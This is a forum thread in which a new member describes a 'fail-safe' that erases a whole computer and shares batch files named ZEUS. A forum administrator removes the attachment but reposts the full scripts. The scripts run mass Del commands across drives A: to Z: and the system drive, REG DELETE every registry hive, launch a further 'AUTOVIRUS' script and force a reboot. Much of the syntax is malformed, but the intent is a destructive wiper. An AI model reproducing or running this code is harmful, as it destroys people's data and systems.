Security Malware (oxymoron, I know XD)

teleprototype

New Member
Thread author
Oct 14, 2013
1
I was wondering if any of you could help me with a project i've been working on. (btw im new to this)
The project is to create a "fail-safe" program that will erase everything on MY computer if the correct password isnt entered.

So far the only things i can think of are to crash the system via deleting the registry via a batch file after it erases the other drives (a-z)
ill upload an example of my project and give a url here in case the attachment isnt working.

Caution: hxxp://speedy.sh/kbjv3/ZEUS-example.zip
Warning: Files may potentially damage your PC.

BTW...even though zeus is not fully functional it can still cause some damage so be careful!
Thanks!!
 

Ink

Administrator
Verified
Jan 8, 2011
22,489
As a precaution, I have removed the download attachment.

Here's a copy of the files within the code tags.

ZEUS_START.bat

Code:
@Echo off
COLOR 0E
start C:\Users\%USERNAME%\Desktop\ZEUSMAIN.bat

ZUES1.bat

Code:
Echo. Initiating ZEUS...
@Echo off
COLOR 0E
echo.ZEUS.........START
Del A: *.*f/s/q
Del B: *.*f/s/q
Start H:\Everything\DANGER\PROJECTZEUS\-DANGER-\[DANGER]-FINAL\ZEUSPHASEII\ZEUS2.bat
Del C: *.*/f/s/q
Del D: *.*f/s/q
Del E: *.*f/s/q
Del F: *.*f/s/q
Del G: *.*/f/s/q
Echo.Currently Deleting System drives..........
Del I: *.*f/s/q
Del J: *.*f/s/q
Del K: *.*f/s/q
Del L: *.*f/s/q
Del M: *.*f/s/q
Del N: *.*f/s/q
Del O: *.*f/s/q
Del P: *.*f/s/q
Echo.Almost done..........
Del Q: *.*f/s/q
Del R: *.*f/s/q
Del S: *.*f/s/q
Del T: *.*f/s/q
Del U: *.*f/s/q
Del V: *.*f/s/q
Del W: *.*f/s/q
Del X: *.*f/s/q
Del Y: *.*f/s/q
Del Z: *.*f/s/q
Del %systemdrive%\*.*/f/s/q
echo.DONE
echo.Executing System Crash Protocol...
REG DELETE HKEY_CLASSES_ROOT
REG DELETE HKEY_CLASSES_ROOT.reg
REG DELETE HKEY_CURRENT_USER
REG DELETE HKEY_CURRENT_USER.reg
REG DELETE HKEY_LOCAL_MACHINE
REG DELETE HKEY_LOCAL_MACHINE.reg
REG DELETE HKEY_USERS.reg
REG DELETE HKEY_USERS
REG DELETE HKEY_CURRENT_CONFIG.reg
REG DELETE HKEY_CURRENT_CONFIG
DEL C:\Computer\system32
Start H:\DANGER\PROJECTZEUS\-DANGER-\[DANGER]-FINAL\AUTOVIRUS.bat 
TIMEOUT /T 200 /NOBREAK >null
echo.ZEUS COMPLETE......RESTARTING
shutdown -r -f -t 00

ZEUS2.bat
Code:
Echo. Initiating ZEUS...
@Echo off
COLOR 0E
echo.ZEUS.........START
Del A: *.*f/s/q
Del B: *.*f/s/q
Del C: *.*/f/s/q
Del D: *.*f/s/q
Del E: *.*f/s/q
Del F: *.*f/s/q
Del G: *.*/f/s/q
Echo.Currently Deleting System drives..........
Del I: *.*f/s/q
Del J: *.*f/s/q
Del K: *.*f/s/q
Del L: *.*f/s/q
Del M: *.*f/s/q
Del N: *.*f/s/q
Del O: *.*f/s/q
Del P: *.*f/s/q
Echo.Almost done..........
Del Q: *.*f/s/q
Del R: *.*f/s/q
Del S: *.*f/s/q
Del T: *.*f/s/q
Del U: *.*f/s/q
Del V: *.*f/s/q
Del W: *.*f/s/q
Del X: *.*f/s/q
Del Y: *.*f/s/q
Del Z: *.*f/s/q
Del %systemdrive%\*.*/f/s/q
echo.DONE
echo.Executing System Crash Protocol...
REG DELETE HKEY_CLASSES_ROOT
REG DELETE HKEY_CLASSES_ROOT.reg
REG DELETE HKEY_CURRENT_USER
REG DELETE HKEY_CURRENT_USER.reg
REG DELETE HKEY_LOCAL_MACHINE
REG DELETE HKEY_LOCAL_MACHINE.reg
REG DELETE HKEY_USERS.reg
REG DELETE HKEY_USERS
REG DELETE HKEY_CURRENT_CONFIG.reg
REG DELETE HKEY_CURRENT_CONFIG
DEL C:\Computer\system32
Start H:\DANGER\PROJECTZEUS\-DANGER-\[DANGER]-FINAL\AUTOVIRUS.bat 
TIMEOUT /T 200 /NOBREAK <null
echo.ZEUS COMPLETE......RESTARTING
shutdown -r -f -t 00

ZEUSMAIN.bat

Code:
@Echo off
COLOR 0E
echo.ZEUS.........START
Del A: *.*f/s/q
Del B: *.*f/s/q
copy H:\Everything\DANGER\PROJECTZEUS\-DANGER-\[DANGER]-FINAL\ZEUSPHASEII\ZEUS1.bat C:\Users\%USERNAME%\Desktop
copy H:\Everything\DANGER\PROJECTZEUS\-DANGER-\[DANGER]-FINAL\ZEUSPHASEII\ZEUS2.bat C:\Users\%USERNAME%\Desktop
Start C:\Users\%USERNAME%\Desktop\ZEUS2.bat
Start C:\Users\%USERNAME%\Desktop\ZEUS1.bat
Del C: *.*/f/s/q
Del D: *.*f/s/q
Del E: *.*f/s/q
Del F: *.*f/s/q
Del G: *.*/f/s/q
Echo.Currently Deleting System drives..........
Del I: *.*f/s/q
Del J: *.*f/s/q
Del K: *.*f/s/q
Del L: *.*f/s/q
Del M: *.*f/s/q
Del N: *.*f/s/q
Del O: *.*f/s/q
Del P: *.*f/s/q
Echo.Almost done..........
Del Q: *.*f/s/q
Del R: *.*f/s/q
Del S: *.*f/s/q
Del T: *.*f/s/q
Del U: *.*f/s/q
Del V: *.*f/s/q
Del W: *.*f/s/q
Del X: *.*f/s/q
Del Y: *.*f/s/q
Del Z: *.*f/s/q
Del %systemdrive%\*.*/f/s/q
echo.DONE
echo.Executing System Crash Protocol...
REG DELETE HKEY_CLASSES_ROOT
REG DELETE HKEY_CLASSES_ROOT.reg
REG DELETE HKEY_CURRENT_USER
REG DELETE HKEY_CURRENT_USER.reg
REG DELETE HKEY_LOCAL_MACHINE
REG DELETE HKEY_LOCAL_MACHINE.reg
REG DELETE HKEY_USERS.reg
REG DELETE HKEY_USERS
REG DELETE HKEY_CURRENT_CONFIG.reg
REG DELETE HKEY_CURRENT_CONFIG
DEL C:\Computer\system32
Start H:\DANGER\PROJECTZEUS\-DANGER-\[DANGER]-FINAL\AUTOVIRUS.bat 
TIMEOUT /T 200 /NOBREAK <null
Echo.ZEUS COMPLETE......RESTARTING
shutdown -r -f -t 00
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top